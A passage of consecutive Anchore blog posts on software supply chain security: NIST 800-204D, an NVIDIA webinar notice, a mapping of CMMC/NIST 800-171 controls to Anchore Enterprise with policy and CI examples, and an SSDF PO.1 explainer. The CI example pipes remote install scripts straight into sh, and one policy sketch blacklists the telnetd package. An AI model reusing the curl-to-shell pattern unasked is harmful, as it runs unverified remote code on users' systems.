The broader message from NIST’s involvement is clear: broad supply chain security is important. It’s not about isolated solutions or patchwork fixes. The industry needs a comprehensive approach that addresses risk at every stage of the software supply chain.

In NIST’s proactive approach, there is hope. Their commitment to providing long-lasting, influential guidance, combined with their holistic view of the supply chain, promises a future where supply chain security is not just an afterthought but an integral part of software development and deployment.

NIST’s 800-204D is more than just a publication. It’s a call for the industry to come together, adopt best practices, and work towards a future where software supply chain security is robust, reliable, and resilient.

If you’d like to learn more about how Anchore can help with NIST compliance, feel free to book a time to speak with one of our specialists.


Scaling Software Security with NVIDIA

Personal computing and Apple in the 80s. The modern internet and Netscape in the 90s. Open source and Red Hat in the 2000s. Cloud and Amazon Web Services in the 2010s. Certain companies tend to define the computing paradigm of a decade. And so it is with AI and NVIDIA in the 2020s. With its advanced GPU hardware, NVIDIA has enabled stunning advances in machine learning and AI models. That, in turn, has enabled services such as GitHub Copilot and ChatGPT.

However, AI/ML is not just a hardware and data story. Software continues to be the glue that enables the use of large data sets with high-performance hardware. Like Intel before them, NVIDIA is as much a software vendor as a hardware company, with platforms like CUDA being how developers interact with NVIDIA’s GPUs. Building on the trends of previous decades, much of this software is built from open source and designed to run on the cloud.

Unfortunately, the less welcome trend over the past decade has been increased software insecurity and novel attack vectors targeted at open source and the supply chain in general. For the past few years, we’ve been proud to partner with NVIDIA to ensure that the software they produce is secure and also secure for end users to run on their NVIDIA GPU Cloud (NGC). This has not only been a question of high-quality security scanning but ensuring that scanning can happen at scale and in a cost-effective manner. 

We’re inviting the Anchore community to join us for a webinar with NVIDIA where we cover the use case, architecture, and policies used by one of the most cutting-edge companies in technology. Those interested can learn more and save a seat here.

Automated Policy Enforcement for CMMC with Anchore Enterprise

The Cybersecurity Maturity Model Certification (CMMC) is an important program to harden the cybersecurity posture of the defense industrial base. Its purpose is to validate that appropriate safeguards are in place to protect controlled unclassified information (CUI). Many of the organizations that are required to comply with CMMC are Anchore customers. They have the responsibility to protect the sensitive but unclassified data of US military and government agencies as they support the various missions of the United States.

CMMC 2.0 Levels

  • Level 1 Foundation: Safeguard federal contract information (FCI); not critical to national security.
  • Level 2 Advanced: This maps directly to NIST Special Publication (SP) 800-171. Its primary goal is to ensure that government contractors are properly protecting controlled unclassified information (CUI).
  • Level 3 Expert: This maps directly to NIST Special Publication (SP) 800-172. Its primary goal is to go beyond the base-level security requirements defined in NIST 800-171. NIST 800-172 provides security requirements that specifically defend against advanced persistent threats (APTs).

This is of critical importance as these organizations leverage commonplace DevOps tooling to build their software. Additionally, these large organizations may be working with smaller subcontractors or suppliers who are building software in tandem or partnership.

For example, imagine a mega-defense contractor working alongside a small mom-and-pop shop to develop software for a classified government system. We should have lots of questions here:

  1. How can my company, as a mega-defense contractor, validate that software built by my partner is not using blacklisted software packages?
  2. How can my company validate software supplied to me is free of malware?
  3. How can I validate that the software supplied to me is in compliance with licensing standards and vulnerability compliance thresholds of my security team?
  4. How do I validate that the software I’m supplying is compliant not only with NIST 800-171 and CMMC, but also with the compliance standards of my government end user (such as NIST 800-53 or NIST 800-161)?

Validating Security between DevSecOps Pipelines and Software Supply Chain

At any contractor, major or small, everyone has taken steps to build internal DevSecOps (DSO) pipelines. However, the defense industrial base (DIB) commonly involves relationships in which a smaller defense contractor supplies software to a larger defense contractor whose program or DSO pipeline consumes and implements that software. With Anchore Enterprise, we can now validate whether supplied software is compliant with CMMC controls as specified in NIST 800-171.

Looking to learn more about how to achieve CMMC Level 2 or NIST 800-171 compliance? One of the most popular technology shortcuts is to utilize a DoD software factory. Anchore has been helping organizations and agencies put the Sec in DevSecOps by securing traditional software factories, transforming them into DoD software factories.

Which Controls does Anchore Enterprise Automate?

3.1.7 – Restrict Non-Privileged Users and Log Privileged Actions

Related NIST 800-53 Controls: AC-6 (10)

Description: Prevent non-privileged users from executing privileged functions and capture the execution of such functions in audit logs. 

Implementation: Anchore Enterprise can scan the container manifests to determine if the user is being given root privileges and implement an automated policy to prevent build containers from entering a runtime environment. This prevents a scenario where any privileged functions can be utilized in a runtime environment.
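
As a sketch of what such a rule can look like, the Anchore policy fragment below stops any image whose Dockerfile leaves the effective user as root. The field values are illustrative rather than a definitive policy:

{
  "gate": "dockerfile",
  "trigger": "effective_user",
  "action": "STOP",
  "params": [
    { "name": "users", "value": "root" },
    { "name": "type", "value": "blacklist" }
  ]
}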

3.4.1 – Maintain Baseline Configurations & Inventories

Related NIST 800-53 Controls: CM-2(1), CM-8(1), CM-6

Description: Establish and maintain baseline configurations and inventories of organizational systems (including hardware, software, firmware, and documentation) throughout the respective system development life cycles.

Implementation: Anchore Enterprise provides a centralized inventory of all containers and their associated manifests at each stage of the development pipeline. All manifests, images and containers are automatically added to the central tracking inventory so that a complete list of all artifacts of the build pipeline can be tracked at any moment in time.

3.4.2 – Enforce Security Configurations

Related NIST 800-53 Controls: CM-2(1), CM-8(1), CM-6

Description: Establish and enforce security configuration settings for information technology products employed in organizational systems.

Implementation: Anchore Enterprise scans all container manifest files for security configurations and publishes found vulnerabilities to a centralized database that can be used for monitoring, ad-hoc reporting, alerting and/or automated policy enforcement.

3.4.3 – Monitor and Log System Changes with Approval Process

Related NIST 800-53 Controls: CM-3

Description: Track, review, approve or disapprove, and log changes to organizational systems.

Implementation: Anchore Enterprise provides a centralized dashboard that tracks all changes to applications which makes scheduled reviews simple. It also provides an automated controller that can apply policy-based decision making to either automatically approve or reject changes to applications based on security rules.

3.4.4 – Run Security Analysis on All System Changes

Related NIST 800-53 Controls: CM-4

Description: Analyze the security impact of changes prior to implementation.

Implementation: Anchore Enterprise can scan changes to applications for security vulnerabilities during the build pipeline to determine the security impact of the changes.
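
The same idea can be approximated in any CI system with Anchore’s open source Grype: fail the build when a change introduces vulnerabilities above a chosen severity threshold. The image name below is hypothetical:

❯ grype registry.example.com/app:candidate --fail-on high   # exits non-zero if any High or Critical findings exist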

3.4.6 – Apply Principle of Least Functionality

Related NIST 800-53 Controls: CM-7

Description: Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.

Implementation: Anchore Enterprise can scan all applications to ensure that they are uniformly applying the principle of least functionality to individual applications. If an application does not meet this standard then Anchore Enterprise can be configured to prevent an application from being deployed to a production environment.

3.4.7 – Limit Use of Nonessential Programs, Ports, and Services

Related NIST 800-53 Controls: CM-7(1), CM-7(2)

Description: Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.

Implementation: Anchore Enterprise can be configured as a gating agent that will scan for specific security violations and prevent these applications from being deployed until the violations are remediated.

3.4.8 – Implement Blacklisting and Whitelisting Software Policies

Related NIST 800-53 Controls: CM-7(4), CM-7(5)

Description: Apply deny-by-exception (blacklisting) policy to prevent the use of unauthorized software or deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Implementation: Anchore Enterprise can be configured as a gating agent that will apply a security policy to all scanned software. The policies can be configured in a black- or white-listing manner.
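
A sketch of a deny-by-exception (blacklisting) rule in an Anchore policy might look like the fragment below; the package name and field values are illustrative:

{
  "gate": "packages",
  "trigger": "blacklist",
  "action": "STOP",
  "params": [
    { "name": "name", "value": "telnetd" }
  ]
}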

3.4.9 – Control and Monitor User-Installed Software

Related NIST 800-53 Controls: CM-11

Description: Control and monitor user-installed software.

Implementation: Anchore Enterprise scans all software in the development pipeline and records all user-installed software. The scans can be monitored in the provided dashboard. User-installed software can be controlled (allowed or denied) via the gating agent.

3.5.10 – Store and Transmit Only Cryptographically-Protected Passwords

Related NIST 800-53 Controls: IA-5(1)

Description: Store and transmit only cryptographically-protected passwords.

Implementation: Anchore Enterprise can scan for plain-text secrets in build artifacts and prevent exposed secrets from being promoted to the next environment until the violation is remediated. This prevents unauthorized storage or transmission of unencrypted passwords or secrets. See screenshot below to see this protection in action.

3.11.2 – Scan for Vulnerabilities

Related NIST 800-53 Controls: RA-5, RA-5(5)

Description: Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.

Implementation: Anchore Enterprise is designed to scan all systems and applications for vulnerabilities continuously and alert when any changes introduce new vulnerabilities. See screenshot below to see this protection in action.

3.11.3 – Remediate Vulnerabilities Respective to Risk Assessments

Related NIST 800-53 Controls: RA-5, RA-5(5)

Description: Remediate vulnerabilities in accordance with risk assessments.

Implementation: Anchore Enterprise can be tuned to allow or deny changes based on a risk scoring system.

3.12.2 – Implement Plans to Address System Vulnerabilities

Related NIST 800-53 Controls: CA-5

Description: Develop and implement plans of action designed to correct deficiencies and reduce or eliminate vulnerabilities in organizational systems.

Implementation: Anchore Enterprise automates the process of ensuring all software and systems are in compliance with the security policy of the organization. 

3.13.4 – Block Unauthorized Information Transfer via Shared Resources

Related NIST 800-53 Controls: SC-4

Description: Prevent unauthorized and unintended information transfer via shared system resources.

Implementation: Anchore Enterprise can be configured as a gating agent that scans for unauthorized and unintended information transfer and blocks the offending artifacts from moving between shared system resources until the violations are remediated.

3.13.8 – Use Cryptography to Safeguard CUI During Transmission

Related NIST 800-53 Controls: SC-8

Description: Implement cryptographic mechanisms to prevent unauthorized disclosure of CUI during transmission unless otherwise protected by alternative physical safeguards.

Implementation: Anchore Enterprise can be configured as a gating agent that scans for CUI and prevents it from being disclosed between systems in violation of organization-defined CUI policies.

3.14.5 – Periodically Scan Systems and Scan External Files in Real Time

Related NIST 800-53 Controls: SI-2

Description: Perform periodic scans of organizational systems and real-time scans of files from external sources as files are downloaded, opened, or executed.

Implementation: Anchore Enterprise can be configured to scan all external dependencies that are built into software and surface relevant security vulnerabilities in the software development pipeline. See the screenshot below for this protection in action.
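One way to wire this into a pipeline is sketched below as a GitHub Actions fragment built on Anchore's open-source Syft and Grype tools: every build generates an SBOM of the image, covering its external dependencies, and scans it before the artifact moves on. The image name and workflow wiring are hypothetical.

    # Illustrative CI fragment: SBOM generation plus dependency scan on every build.
    - name: Generate SBOM with Syft
      run: |
        curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
        syft myorg/myapp:${{ github.sha }} -o syft-json > sbom.json

    - name: Scan dependencies with Grype
      run: |
        curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
        grype sbom:./sbom.json --fail-on high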

Wrap-Up

In a world increasingly defined by software, the cybersecurity posture of defense-related industries is paramount. The CMMC, with its graduated levels of compliance, underscores the defense industrial base's commitment to fortifying its cyber defenses.

As organizations ranging from the largest defense contractors to small mom-and-pop shops work in tandem to support U.S. missions, the intricacies of maintaining cybersecurity standards grow. The questions posed exemplify the need to validate software integrity, especially in complex collaborations.

Anchore Enterprise solves these problems by automating software supply chain security best practices. It not only automates a myriad of crucial controls, ranging from user privilege restrictions to vulnerability scanning, but it also empowers organizations to meet and exceed the benchmarks set by CMMC and NIST. 

In essence, as defense entities navigate the nuanced web of software development and partnerships, tools like Anchore Enterprise are indispensable in safeguarding the nation’s interests, ensuring the integrity of software supply chains, and championing the highest levels of cybersecurity.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists.

Breaking Down NIST SSDF: Spotlight on PO.1 – Prepare the Organization

After the last blog post about the SSDF, I decided to pick something much easier to write about, and it happens to be at the top of the list. We'll cover PO.1 this time; it's the very first practice in the SSDF, and "PO" stands for Prepare the Organization. The description is:

Define Security Requirements for Software Development (PO.1): Ensure that security requirements for software development are known at all times so that they can be taken into account throughout the SDLC and duplication of effort can be minimized because the requirements information can be collected once and shared. This includes requirements from internal sources (e.g., the organization’s policies, business objectives, and risk management strategy) and external sources (e.g., applicable laws and regulations).

How hard can it be to prepare the organization? Just tell them we’re doing it and it’s a job well done!

This is actually one of the most important, and hardest, steps when creating a secure development program. We really only get one chance with developers: if we keep changing what we're asking them to do, we create an environment that lacks trust, empathy, and cooperation. This is why the preparation stage is such an important step when deploying the SSDF in your organization.

We all work for companies whose primary mission isn't to write secure software; the actual mission is to provide a product or service to customers. Writing secure software is one of the tools that can help with the primary mission. Sometimes as security professionals we forget this very important point. Security isn't the purpose; security is part of what we do, or at least it should be. It's important that we integrate into the existing processes and procedures our organization already has. One of the reference documents for PO.1 is NIST 800-161, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations. It's worth reading the first few sections of NIST 800-161 not for the security advice but for the organizational aspects. It stresses the importance of cooperation and getting the company to buy into a supply chain risk management program. We could say the days of security teams issuing mandates are over, but those days probably never really existed.

The steps to prepare the organization

PO.1 is broken into three pieces. The first two sections explain how to document the processes we're going to create and implement. The third section revolves around communicating those documented processes. This seems obvious, but in reality it doesn't happen consistently. It's easy for a security team to create a process and never tell anyone about it; in many instances, telling people about the process is harder than creating it. Harder still is bringing that process and policy to another group, collecting their feedback, and making sure they buy into it.

PO.1.1: Infrastructure security requirements

The first section is about documenting the internal infrastructure and process. The first control also mentions maintaining this documentation over time. It's possible your organization already has these documents in place; if so, good job! If not, there's no better time to start than now. SANS has a nice library of existing security policy documents that can help get things moving. The intention isn't to take these templates as-is and declare them your new security policy. Use existing documents as a guide, and make sure you have agreement and understanding from the business. Security can't show up with a canned document it didn't write and declare it the new policy. That won't work.

PO.1.2: Software security requirements

The second section revolves around how we're going to actually secure our software and services. It's important to note this control isn't about the actual process of securing the software, but about documenting what that process will look like. One of the difficulties of securing the software you build is that no two organizations are the same. Documenting how we're going to build secure software, or how we're going to secure our environment, is a lot of work. OWASP has a nice toolbox called SAMM, the Software Assurance Maturity Model, that can help with this stage.

There's no shortcut to building a secure development program. It's a lot of hard work and there will be plenty of trial and error. The most important aspect will be getting cooperation and buy-in from all the stakeholders. Security can't do this alone.

PO.1.3: Communicate the requirements

The third section talks about communicating these requirements to the organization. How hard can communication be? A security team can create fantastic documentation and policy, but then put it somewhere the rest of the company doesn't know exists or, in some cases, can't even access.

This is a problem because the policy has to be something everyone in the organization is aware of: people need to know where to find it, how to get help, and what it covers. It can't be stressed enough how important this stage is. If you tell your developers they have to follow your policy, but it's poorly written, they can't find it, or they don't understand why something is happening, those developers aren't going to engage and they aren't going to want to work with you.

Next steps

If you're on a journey to implement the SSDF, or you're just looking to start formalizing your secure development program, these are some steps you can start taking today. This blog series uses the SSDF as our secure development standard, so you can start by reading the content NIST has published on its Secure Software Development Framework site. Follow that up with a tour of the SANS policy templates; most of these templates shouldn't be used without customization, since every company and every development team has unique processes and needs. The CSA has a nice document called the CAIQ, or Consensus Assessment Initiative Questionnaire, that can help create some focus on what you need. Combining this with a SAMM assessment would be a great place to start.

And lastly, whatever standard you choose, and whatever internal process you create, it’s important to keep in mind this is a fluid and ever-changing space. You will have to revisit decisions and assumptions on a regular basis. The SSDF standard will change, your business will change, everything will change. It’s the old joke that the only constant is change.

Want to better understand how Anchore can help? Schedule a demo here.

Josh Bressers

Josh Bressers is vice president of security at Anchore where he guides security feature development for the company’s commercial and open source solutions. He serves on the Open Source Security Foundation technical advisory council and is a co-founder of the Global Security Database project, which is a Cloud Security Alliance working group that is defining the future of security vulnerability identifiers.
